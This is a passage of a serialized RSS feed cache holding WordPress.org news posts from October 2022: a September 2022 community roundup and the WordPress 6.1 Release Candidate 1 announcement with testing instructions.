wordpress\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:35:\"https://wordpress.org/news/?p=13596\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:179:\"September was an exciting month with the return of many in-person WordCamps, WordPress Translation Day, and preparations for WordPress 6.1. Let\'s catch up on all things WordPress.\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:9:\"enclosure\";a:1:{i:0;a:5:{s:4:\"data\";s:0:\"\";s:7:\"attribs\";a:1:{s:0:\"\";a:3:{s:3:\"url\";s:61:\"https://wordpress.org/news/files/2022/10/tt3_variations-1.mp4\";s:6:\"length\";s:6:\"996018\";s:4:\"type\";s:9:\"video/mp4\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:14:\"rmartinezduque\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:40:\"http://purl.org/rss/1.0/modules/content/\";a:1:{s:7:\"encoded\";a:1:{i:0;a:5:{s:4:\"data\";s:15456:\"\n<p>September was an exciting month with the return of many in-person WordCamps, WordPress Translation Day, and preparations for WordPress 6.1. Contributors across teams continue to work hard to ensure that the last major release of the year is the best it can be for everyone. Let&#8217;s catch up on all things WordPress.</p>\n\n\n\n<hr class=\"wp-block-separator has-css-opacity\" />\n\n\n\n<h2>Countdown to WordPress 6.1: Coming November 1, 2022</h2>\n\n\n\n<p><strong>WordPress 6.1 is scheduled for release on November 1, 2022</strong>—less than three weeks away. Following the beta releases in September, the <a href=\"https://wordpress.org/news/2022/10/wordpress-6-1-release-candidate-1-rc1-now-available/\">first release candidate (RC1) is now ready for download and testing</a>.</p>\n\n\n\n<p>Members of the release squad hosted a casual walk-through of some of the expected WordPress 6.1 features last month. ​​<a href=\"https://make.wordpress.org/core/2022/09/14/6-1-product-walk-through-recap/\">The recording and transcript are available in this post</a>.</p>\n\n\n\n<p>This next major release focuses on increased control for a more intuitive site and content creation experience, and will be bundled with a new default block theme, <strong>Twenty Twenty-Three (TT3)</strong>. This theme comes with <a href=\"https://make.wordpress.org/design/2022/09/07/tt3-default-theme-announcing-style-variation-selections/\">10 style variations designed by community members</a> that you can easily switch between to customize the look and feel of your site.</p>\n\n\n\n<p>Other exciting updates include <a href=\"https://make.wordpress.org/core/2022/09/26/core-editor-improvement-catalyst-for-creativity/\">enhanced consistency of design tools across blocks</a>, a <a href=\"https://make.wordpress.org/core/2022/08/25/core-editor-improvement-refining-the-template-creation-experience/\">refined</a> and <a href=\"https://make.wordpress.org/core/2022/07/21/core-editor-improvement-deeper-customization-with-more-template-options/\">expanded template creation experience</a>, improved Quote and List blocks, and support for <a href=\"https://make.wordpress.org/core/2022/08/04/whats-new-in-gutenberg-13-8-3-august/#fluid-typography-support\">fluid typography</a>.</p>\n\n\n\n<figure class=\"wp-block-video\"><video controls src=\"https://wordpress.org/news/files/2022/10/tt3_variations-1.mp4\"></video><figcaption class=\"wp-element-caption\"><em>Selected style variations for the Twenty Twenty-Three theme.</em></figcaption></figure>\n\n\n\n<p><strong>Want to know what else is new in WordPress 6.1?</strong> Check out these resources for more details:</p>\n\n\n\n<ul>\n<li><a href=\"https://make.wordpress.org/core/2022/09/24/roadmap-to-6-1-core-companion/\">Roadmap to 6.1: Core Companion</a></li>\n\n\n\n<li><a href=\"https://make.wordpress.org/core/2022/10/12/wordpress-6-1-field-guide/\">WordPress 6.1 Field Guide</a></li>\n\n\n\n<li><a href=\"https://make.wordpress.org/core/2022/10/11/wordpress-6-1-accessibility-improvements/\">​​WordPress 6.1 Accessibility Improvements</a></li>\n\n\n\n<li><a href=\"https://make.wordpress.org/core/2022/10/11/performance-field-guide-for-wordpress-6-1/\">Performance Field Guide for WordPress 6.1</a></li>\n</ul>\n\n\n\n<blockquote class=\"wp-block-quote has-extra-large-font-size\">\n<p>Take part in this release by <a href=\"https://make.wordpress.org/test/2022/09/21/help-test-wordpress-6-1/\">helping to test key features</a> or <a href=\"https://make.wordpress.org/polyglots/2022/10/11/wordpress-6-1-ready-to-be-translated/\">translating WordPress 6.1</a>.</p>\n</blockquote>\n\n\n\n<div style=\"height:10px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n\n\n\n<h2>Gutenberg versions 14.1, 14.2, and 14.3 are out</h2>\n\n\n\n<p>Three new versions of Gutenberg have been released since last month’s edition of The Month in WordPress:</p>\n\n\n\n<ul>\n<li><a href=\"https://make.wordpress.org/core/2022/09/16/whats-new-in-gutenberg-14-1-15-september/\"><strong>Gutenberg 14.1</strong></a> shipped on September 15, 2022. It adds typography and spacing support for many blocks, continuing efforts to consolidate design tools in blocks. It also includes improvements to the Navigation block and the content-locking experience. This is the last version of Gutenberg that will merge into WordPress 6.1, which will include updates from Gutenberg 13.1 to 14.1.</li>\n\n\n\n<li><a href=\"https://make.wordpress.org/core/2022/09/30/whats-new-in-gutenberg-14-2-28-september/\"><strong>Gutenberg 14.2</strong></a> comes with writing flow improvements, a more polished Calendar block, and autocompletion for links. It was released on September 28, 2022.</li>\n\n\n\n<li><a href=\"https://make.wordpress.org/core/2022/10/13/whats-new-in-gutenberg-14-3-12-october/\"><strong>Gutenberg 14.3</strong></a> is available for download as of October 12, 2022. This version makes it easier to navigate text blocks with <code>alt + arrow</code> keyboard combinations, and brings an improved drag-and-drop functionality for images, among other updates.</li>\n</ul>\n\n\n\n<blockquote class=\"wp-block-quote has-extra-large-font-size\">\n<p>Follow the “<a href=\"https://make.wordpress.org/core/tag/gutenberg-new/\">What’s new in Gutenberg</a>” posts to stay on top of the latest enhancements.</p>\n</blockquote>\n\n\n\n<div style=\"height:10px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n\n\n\n<h2>WordPress Translation Day</h2>\n\n\n\n<p>On September 28, 2022, the Polyglots community celebrated <a href=\"https://wptranslationday.org/\"><strong>WordPress Translation Day</strong></a> (WPTD) with some global events throughout the week, including an <a href=\"https://wordpress.tv/2022/09/27/jesus-amieiro-alex-kirk-translate-wordpress-org-feedback-tool-walk-through/\">overview of the GlotPress feedback tool</a>. In addition, there were 13 local events in 11 different languages and across four continents.</p>\n\n\n\n<p>The Training Team joined the celebration by hosting a day-long event to help new contributors translate materials on learn.wordpress.org.</p>\n\n\n\n<blockquote class=\"wp-block-quote has-extra-large-font-size\">\n<p><a href=\"https://make.wordpress.org/polyglots/2022/10/04/2022-wordpress-translation-day-recap/\">Check out this recap</a> for more highlights from the event.</p>\n</blockquote>\n\n\n\n<div style=\"height:10px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n\n\n\n<h2>Team updates: Dropping security updates for WP 3.7 – 4.0, a new developer-focused course, and more</h2>\n\n\n\n<ul>\n<li>The WordPress Security Team will no longer provide <a href=\"https://wordpress.org/news/2022/09/dropping-security-updates-for-wordpress-versions-3-7-through-4-0/\">security updates for WordPress versions 3.7 through 4.0</a> as of December 2022.</li>\n\n\n\n<li>The first developer-focused course, <a href=\"https://learn.wordpress.org/course/using-the-wordpress-data-layer/\">Using the WordPress Data Layer</a>, is live on Learn WordPress.</li>\n\n\n\n<li>The <a href=\"https://make.wordpress.org/community/2022/09/29/meetup-reactivation-update/\">Global Meetup Reactivation project</a> gathered 39 supporters worldwide so far. As a result of their efforts, 117 meetup groups have reactivated or plan to reactivate in 2022!&nbsp;</li>\n\n\n\n<li>Learn more about <code>do_action</code>’s charity hackathons and how to host one in <a href=\"https://make.wordpress.org/community/2022/09/22/meetup-organizer-newsletter-september-2022/\">the latest edition of the Meetup Organizer Newsletter</a>.</li>\n\n\n\n<li>Would you like to help create content for the <a href=\"https://learn.wordpress.org/\">Learn WordPress</a> platform? The Training Team shared a post on <a href=\"https://make.wordpress.org/training/2022/09/30/become-an-online-workshop-facilitator-or-tutorial-presenter-today/\">how to become an online workshop facilitator or tutorial presenter</a>.</li>\n\n\n\n<li>The WebP proposal was pulled from the upcoming WordPress 6.1 release in response to <a href=\"https://make.wordpress.org/core/2022/09/11/webp-in-core-for-6-1/\">this post and subsequent discussions</a>. Users can still get this feature using the <a href=\"https://wordpress.org/plugins/performance-lab/\">Performance Lab plugin</a>.</li>\n\n\n\n<li>WordPress co-founder Matt Mullenweg suggested <a href=\"https://make.wordpress.org/core/2022/09/11/canonical-plugins-revisited/\">revisiting canonical plugins</a> and adopting a plugin-first approach when developing new features for core.</li>\n\n\n\n<li>The Plugin Team <a href=\"https://make.wordpress.org/plugins/2022/09/13/heroku-free-tier-being-retired/\">reminds plugin authors using Heroku&#8217;s free services to update their services</a> after the company announced the removal of their free plans.</li>\n\n\n\n<li>The Openverse Team <a href=\"https://make.wordpress.org/openverse/2022/09/13/community-meeting-recap-13-september-2022/\">removed the ‘beta’ status</a> from audio support. Also, the index <a href=\"https://make.wordpress.org/openverse/2022/09/05/openverse-biweekly-update-september-5th/\">now includes iNaturalist</a>, making it easy to discover CC-licensed images of flora, fauna, and nature contributed by this community of scientists and naturalists.</li>\n\n\n\n<li>The Hosting and Documentation Teams are collaborating on the creation of a new <a href=\"https://make.wordpress.org/hosting/2022/09/07/wordpress-advanced-administration-handbook/\">WordPress Advanced Administration Handbook</a>.</li>\n</ul>\n\n\n\n<blockquote class=\"wp-block-quote has-extra-large-font-size\">\n<p>Want to create diverse and inclusive events that make the WordPress community stronger, but not sure where to get started? <a href=\"https://make.wordpress.org/community/tag/wpdiversity/\">Join WPDiversity to learn more about upcoming workshops</a>.</p>\n</blockquote>\n\n\n\n<div style=\"height:10px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n\n\n\n<h2>Feedback &amp; testing requests</h2>\n\n\n\n<ul>\n<li><a href=\"https://make.wordpress.org/community/2022/09/27/15-oct-survey-deadline/\"><strong>Last call to complete the Meetup Annual Survey</strong></a>! Help strengthen this global WordPress program by sharing your feedback by October 15, 2022.</li>\n\n\n\n<li>The Core Team is seeking <a href=\"https://make.wordpress.org/core/2022/10/10/seeking-proposals-for-interop-2023/\">proposals for Interop 2023</a>. Interop is an effort to improve interoperability across the three major web browser engines (Chromium, WebKit, and Gecko). You can submit yours until October 15, 2022.</li>\n\n\n\n<li>Don&#8217;t miss this call for testing on <a href=\"https://make.wordpress.org/themes/2022/09/12/testing-and-feedback-for-using-block-based-template-parts-in-classic-themes/\">using block-based template parts in classic themes</a>.</li>\n\n\n\n<li>The Community Team is gathering feedback on <a href=\"https://make.wordpress.org/community/2022/09/30/help-improve-the-make-community-contributor-day-onboarding/\">onboarding experiences at Contributor Days</a>.</li>\n\n\n\n<li>Version 20.9 of WordPress for <a href=\"https://make.wordpress.org/mobile/2022/10/04/call-for-testing-wordpress-for-android-20-9/\">Android</a> and <a href=\"https://make.wordpress.org/mobile/2022/10/04/call-for-testing-wordpress-for-ios-20-9/\">iOS</a> is available for testing.</li>\n</ul>\n\n\n\n<blockquote class=\"wp-block-quote has-extra-large-font-size\">\n<p><a href=\"https://wordpress.org/news/2022/10/episode-40-all-things-testing-with-special-guests-anne-mccarthy-and-brian-alexander/\">Tune in to the latest episode of WP Briefing</a> to hear guests Anne McCarthy and Brian Alexander discuss their work on the Testing Team and how you can get involved.</p>\n</blockquote>\n\n\n\n<div style=\"height:10px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n\n\n\n<h2>Event updates &amp; WordCamps</h2>\n\n\n\n<ul>\n<li>The last batch of <a href=\"https://asia.wordcamp.org/2023/\">WordCamp Asia 2023</a> tickets will be released on October 19, 2022. The organizing team is also <a href=\"https://asia.wordcamp.org/2023/call-for-contributors-stories/\">calling for contributors’ stories</a>.</li>\n\n\n\n<li><a href=\"https://us.wordcamp.org/2022/\">WordCamp US (WCUS) 2022</a> was successfully held last month in San Diego, California. Following two days of presentations, workshops, and a <a href=\"https://make.wordpress.org/project/2022/09/19/wcus-2022-qa/\">Q&amp;A session with Matt Mullenweg</a>, more than 300 attendees participated in the <a href=\"https://make.wordpress.org/updates/2022/09/18/wordcamp-us-contributor-day-2022-recap/\">Contributor Day</a>. National Harbor, Maryland, will host <a href=\"https://us.wordcamp.org/2022/announcing-wordcamp-us-2023/\">next year’s WordCamp US</a> and a Community Summit on August 23-25, 2023.</li>\n\n\n\n<li>In addition to WCUS, four in-person WordCamps took place in September in <a href=\"https://jinja.wordcamp.org/2022/\">Jinja (Uganda)</a>, <a href=\"https://kathmandu.wordcamp.org/2022/\">Kathmandu (Nepal)</a>, <a href=\"https://netherlands.wordcamp.org/2022/\">The Netherlands</a>, and <a href=\"https://pontevedra.wordcamp.org/2022/\">Pontevedra (Spain)</a>. And more WordPress events are on the schedule for the rest of October:\n<ul>\n<li><img src=\"https://s.w.org/images/core/emoji/14.0.0/72x72/1f1ea-1f1f8.png\" alt=\"🇪🇸\" class=\"wp-smiley\" style=\"height: 1em; max-height: 1em;\" /> <a href=\"https://valencia.wordcamp.org/2022/\">WordCamp Valencia</a>, Spain on October 21-22, 2022</li>\n\n\n\n<li><img src=\"https://s.w.org/images/core/emoji/14.0.0/72x72/1f1e8-1f1ff.png\" alt=\"🇨🇿\" class=\"wp-smiley\" style=\"height: 1em; max-height: 1em;\" /> <a href=\"https://brno.wordcamp.org/2022/\">WordCamp Brno</a>, Czech Republic on October 22, 2022</li>\n\n\n\n<li><img src=\"https://s.w.org/images/core/emoji/14.0.0/72x72/1f1eb-1f1f7.png\" alt=\"🇫🇷\" class=\"wp-smiley\" style=\"height: 1em; max-height: 1em;\" /> <a href=\"https://lyon.wordcamp.org/2022/\">WordCamp Lyon</a>, France on October 28, 2022</li>\n</ul>\n</li>\n</ul>\n\n\n\n<blockquote class=\"wp-block-quote has-extra-large-font-size\">\n<p>Curious about attending a WordCamp event? Listen to <a href=\"https://wordpress.org/news/2022/09/episode-39-contributor-stories-live-from-wordcamp-us/\">contributor stories from WordCamp US 2022</a> on why they use WordPress and go to WordCamps.</p>\n</blockquote>\n\n\n\n<div style=\"height:10px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n\n\n\n<hr class=\"wp-block-separator has-css-opacity\" />\n\n\n\n<p><strong><em><strong><em><strong><em>Have a story that we should include in the next issue of The Month in WordPress? <strong><em>Fill out </em></strong><a href=\"https://make.wordpress.org/community/month-in-wordpress-submissions/\"><strong><em>this quick form</em></strong></a><strong><em> to let us know.</em></strong></em></strong></em></strong></em></strong></p>\n\n\n\n<p><em><em>The following folks contributed to this edition of The Month in WordPress: </em><a href=\'https://profiles.wordpress.org/chaion07/\' class=\'mention\'><span class=\'mentions-prefix\'>@</span>chaion07</a>, <a href=\'https://profiles.wordpress.org/laurlittle/\' class=\'mention\'><span class=\'mentions-prefix\'>@</span>laurlittle</a>, <a href=\'https://profiles.wordpress.org/rmartinezduque/\' class=\'mention\'><span class=\'mentions-prefix\'>@</span>rmartinezduque</a>, <a href=\'https://profiles.wordpress.org/robinwpdeveloper/\' class=\'mention\'><span class=\'mentions-prefix\'>@</span>robinwpdeveloper</a>, <a href=\'https://profiles.wordpress.org/santanainniss/\' class=\'mention\'><span class=\'mentions-prefix\'>@</span>santanainniss</a>, <a href=\'https://profiles.wordpress.org/webcommsat/\' class=\'mention\'><span class=\'mentions-prefix\'>@</span>webcommsat</a>.</em></p>\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:30:\"com-wordpress:feed-additions:1\";a:1:{s:7:\"post-id\";a:1:{i:0;a:5:{s:4:\"data\";s:5:\"13596\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:4;a:6:{s:4:\"data\";s:69:\"\n		\n		\n		\n		\n		\n				\n		\n		\n		\n		\n		\n\n					\n										\n					\n		\n		\n			\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:4:{s:0:\"\";a:6:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:53:\"WordPress 6.1 Release Candidate 1 (RC1) Now Available\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:87:\"https://wordpress.org/news/2022/10/wordpress-6-1-release-candidate-1-rc1-now-available/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Tue, 11 Oct 2022 20:53:18 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"category\";a:5:{i:0;a:5:{s:4:\"data\";s:11:\"Development\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:1;a:5:{s:4:\"data\";s:8:\"Releases\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:2;a:5:{s:4:\"data\";s:3:\"6.1\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:3;a:5:{s:4:\"data\";s:11:\"development\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:4;a:5:{s:4:\"data\";s:8:\"releases\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:35:\"https://wordpress.org/news/?p=13579\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:320:\"The first release candidate (RC1) for WordPress 6.1 is now available! This is an important milestone in the 6.1 release cycle. “Release Candidate” means that this version of WordPress is ready for release! Before the official release date, time is set aside for the community to perform final reviews and help test. \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:11:\"Dan Soschin\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:40:\"http://purl.org/rss/1.0/modules/content/\";a:1:{s:7:\"encoded\";a:1:{i:0;a:5:{s:4:\"data\";s:9468:\"\n<p>The first release candidate (RC1) for WordPress 6.1 is now available!</p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\" />\n\n\n\n<p>This is an important milestone in the 6.1 release cycle. “Release Candidate” means that this version of WordPress is ready for release! Before the official release date, time is set aside for the community to perform final reviews and help test. Since the WordPress ecosystem includes thousands of plugins and themes, it is important that everyone checks to see if anything was missed along the way. That means the project would <em>love</em> your help.</p>\n\n\n\n<p>WordPress 6.1 is planned for official release on November 1st, 2022, three weeks from today.&nbsp;</p>\n\n\n\n<p><strong>This version of the WordPress software is under development</strong>. Please do not install, run, or test this version of WordPress on production or mission-critical websites. Instead, it is recommended that you test RC1 on a test server and site.&nbsp;</p>\n\n\n\n<p>You can test WordPress 6.1 RC1 in three ways:</p>\n\n\n\n<p><strong>Option 1: </strong>Install and activate the <a href=\"https://wordpress.org/plugins/wordpress-beta-tester/\">WordPress Beta Tester</a> plugin (select the “Bleeding edge” channel and “Beta/RC Only” stream).</p>\n\n\n\n<p><strong>Option 2: </strong>Direct download the <a href=\"https://wordpress.org/wordpress-6.1-RC1.zip\">RC1 version (zip)</a>.</p>\n\n\n\n<p><strong>Option 3:</strong> Use the following WP-CLI command:</p>\n\n\n\n<p><code>wp core update --version=6.1-RC1</code></p>\n\n\n\n<p>Additional information on the <a href=\"https://make.wordpress.org/core/6-1/\">6.1 release cycle is available here</a>.</p>\n\n\n\n<p>Check the <a href=\"https://make.wordpress.org/core/\">Make WordPress Core blog</a> for <a href=\"https://make.wordpress.org/core/tag/dev-notes+6-1/\">6.1-related developer notes</a> in the coming weeks detailing all upcoming changes.</p>\n\n\n\n<h2>What’s in WordPress 6.1 RC1?</h2>\n\n\n\n<p>Since Beta 3, approximately 100 items have been addressed, bringing the total count to more than 2,000 updates since WordPress 6.0 in May of 2022.&nbsp;</p>\n\n\n\n<ul>\n<li><a href=\"https://github.com/WordPress/gutenberg/commits/wp/6.1\">GitHub tickets</a></li>\n\n\n\n<li><a href=\"https://core.trac.wordpress.org/query?status=accepted&amp;status=closed&amp;changetime=10%2F04%2F2022..10%2F11%2F2022&amp;resolution=fixed&amp;milestone=6.1&amp;col=id&amp;col=summary&amp;col=status&amp;col=milestone&amp;col=owner&amp;col=type&amp;col=priority&amp;order=id\">Trac tickets</a>&nbsp;</li>\n</ul>\n\n\n\n<p>WordPress 6.1 is the third major release for 2022, following 5.9 and 6.0, released in January and May of this year, respectively.</p>\n\n\n\n<h3><strong>WordPress 6.1 highlights for end-users</strong></h3>\n\n\n\n<ul>\n<li>Default theme powered by 10 unique style variations (<a href=\"https://make.wordpress.org/design/2022/09/07/tt3-default-theme-announcing-style-variation-selections/\">learn more</a>)</li>\n\n\n\n<li>More design tools in more blocks (<a href=\"https://github.com/WordPress/gutenberg/issues/43241\">learn more</a>)</li>\n\n\n\n<li>Expanded and refined <a href=\"https://make.wordpress.org/core/2022/08/25/core-editor-improvement-refining-the-template-creation-experience/\">template experience</a> and <a href=\"https://make.wordpress.org/core/2022/07/21/core-editor-improvement-deeper-customization-with-more-template-options/\">template options</a></li>\n\n\n\n<li>More intuitive document settings experience</li>\n\n\n\n<li>Improved quote and list blocks with inner block support</li>\n\n\n\n<li>More robust placeholders for various blocks</li>\n\n\n\n<li>New modal interfaces and preferences improvements</li>\n\n\n\n<li>Automatic navigation block selection with fallbacks and easier menu management</li>\n\n\n\n<li>Apply locking settings to all inner blocks in one click</li>\n\n\n\n<li>Improvements to the block theme discovery experience</li>\n\n\n\n<li><a href=\"https://make.wordpress.org/core/2022/10/11/wordpress-6-1-accessibility-improvements/\">Accessibility updates</a>, with more than 60 resolved tickets</li>\n\n\n\n<li><a href=\"https://make.wordpress.org/core/2022/10/11/performance-field-guide-for-wordpress-6-1/\">Performance updates</a>, with more than 25 resolved tickets</li>\n</ul>\n\n\n\n<h3><strong>WordPress 6.1 highlights for developers</strong></h3>\n\n\n\n<ul>\n<li>Opt into appearance tools to make any theme more powerful</li>\n\n\n\n<li>New iteration on the style system</li>\n\n\n\n<li>Add starter patterns to any post type (<a href=\"https://make.wordpress.org/core/2022/07/07/whats-new-in-gutenberg-13-6-6-july/#post-type-patterns\">learn more</a>)</li>\n\n\n\n<li>Evolution of layout options including a new constrained option and the ability to disable layout options</li>\n\n\n\n<li>Content lock patterns for more curation options</li>\n\n\n\n<li>Expanded support for query loop blocks</li>\n\n\n\n<li>Allow the use of block-based template parts in classic themes (<a href=\"https://make.wordpress.org/themes/2022/09/12/testing-and-feedback-for-using-block-based-template-parts-in-classic-themes/\">give feedback</a>)</li>\n\n\n\n<li>Filter <code>theme.json</code> data (<a href=\"https://developer.wordpress.org/block-editor/reference-guides/filters/global-styles-filters/\">learn more</a>)</li>\n\n\n\n<li>Fluid typography allows for more responsiveness (<a href=\"https://make.wordpress.org/themes/2022/08/15/testing-and-feedback-for-the-fluid-typography-feature/\">give feedback</a>)</li>\n\n\n\n<li>Ability to style elements inside blocks like buttons, headings, or captions in <code>theme.json</code></li>\n</ul>\n\n\n\n<p><em>Please note that all features listed in this post are subject to change before the final release</em>.</p>\n\n\n\n<h2>Plugin and theme developers</h2>\n\n\n\n<p>All plugin and theme developers should test their respective extensions against WordPress 6.1 RC1 and update the “<em>Tested up to”</em> version in their readme file to 6.1. If you find compatibility problems, please post detailed information to the <a href=\"https://wordpress.org/support/forum/alphabeta/\">support forums</a>, so these items can be investigated further prior to the final release date of November 1st.</p>\n\n\n\n<h2>Translate WordPress</h2>\n\n\n\n<p>Do you speak a language other than English? <a href=\"https://translate.wordpress.org/projects/wp/dev\">Help translate WordPress into more than 100 languages.</a> This release also marks the <a href=\"https://make.wordpress.org/polyglots/handbook/glossary/#hard-freeze\">hard string freeze</a> point of the 6.1 release cycle.</p>\n\n\n\n<h2>Keep WordPress bug-free – help with testing</h2>\n\n\n\n<p>Testing for issues is critical for stabilizing a release throughout its development. Testing is also a great way to contribute. <a href=\"https://make.wordpress.org/test/2022/09/21/help-test-wordpress-6-1/\">This detailed guide</a> is an excellent start if you have never tested a beta release.</p>\n\n\n\n<p>Testing helps ensure that this and future releases of WordPress are as stable and issue-free as possible. Anyone can take part in testing – regardless of prior experience.</p>\n\n\n\n<p>Want to know more about testing releases like this one? Read about the <a href=\"https://make.wordpress.org/test/\">testing initiatives</a> that happen in Make Core. You can also join a <a href=\"https://wordpress.slack.com/messages/core-test/\">core-test channel</a> on the <a href=\"https://wordpress.slack.com/\">Making WordPress Slack workspace</a>.</p>\n\n\n\n<p>If you have run into an issue, please report it to the <a href=\"https://wordpress.org/support/forum/alphabeta/\">Alpha/Beta area</a> in the support forums. If you are comfortable writing a reproducible bug report, you can <a href=\"https://core.trac.wordpress.org/newticket\">file one on WordPress Trac</a>. This is also where you can find a list of <a href=\"https://core.trac.wordpress.org/tickets/major\">known bugs</a>.</p>\n\n\n\n<p>To review features in the Gutenberg releases since WordPress 6.0 (the most recent major release of WordPress), access the <em>What’s New In Gutenberg</em> posts for <a href=\"https://make.wordpress.org/core/2022/09/16/whats-new-in-gutenberg-14-1-15-september/\">14.1</a>, <a href=\"https://make.wordpress.org/core/2022/09/01/whats-new-in-gutenberg-14-0-31-august/\">14.0</a>, <a href=\"https://make.wordpress.org/core/2022/08/17/whats-new-in-gutenberg-13-9-17-august/\">13.9</a>, <a href=\"https://make.wordpress.org/core/2022/08/04/whats-new-in-gutenberg-13-8-3-august/\">13.8</a>, <a href=\"https://make.wordpress.org/core/2022/07/20/whats-new-in-gutenberg-13-7-20-july/\">13.7</a>, <a href=\"https://make.wordpress.org/core/2022/07/07/whats-new-in-gutenberg-13-6-6-july/\">13.6</a>, <a href=\"https://make.wordpress.org/core/2022/06/22/whats-new-in-gutenberg-13-5-22-june/\">13.5</a>, <a href=\"https://make.wordpress.org/core/2022/06/10/whats-new-in-gutenberg-13-4-8-june/\">13.4</a>, <a href=\"https://make.wordpress.org/core/2022/05/26/whats-new-in-gutenberg-13-3-0-may-25/\">13.3</a>, <a href=\"https://make.wordpress.org/core/2022/05/12/whats-new-in-gutenberg-13-2-may-11/\">13.2</a>, and <a href=\"https://make.wordpress.org/core/2022/04/28/whats-new-in-gutenberg-13-1-27-april/\">13.1</a>.</p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\" />\n\n\n\n<h2>Haiku Fun for RC1</h2>\n\n\n\n<p>Languages abound<br>Test today, releases soon<br>Freedom to publish</p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\" />\n\n\n\n<p>Thank you to the following contributors for collaborating on this post:&nbsp;<a href=\"https://profiles.wordpress.org/webcommsat/\">@webcommsat</a></p>\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:30:\"com-wordpress:feed-additions:1\";a:1:{s:7:\"post-id\";a:1:{i:0;a:5:{s:4:\"data\";s:5:\"13579\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:5;a:6:{s:4:\"data\";s:69:\"\n		\n		\n		\n		\n		\n				\n		\n		\n		\n		\n		\n\n					\n										\n					\n		\n		\n			\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:4:{s:0:\"\";a:6:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:34:\"WordPress 6.1 Beta 3 Now 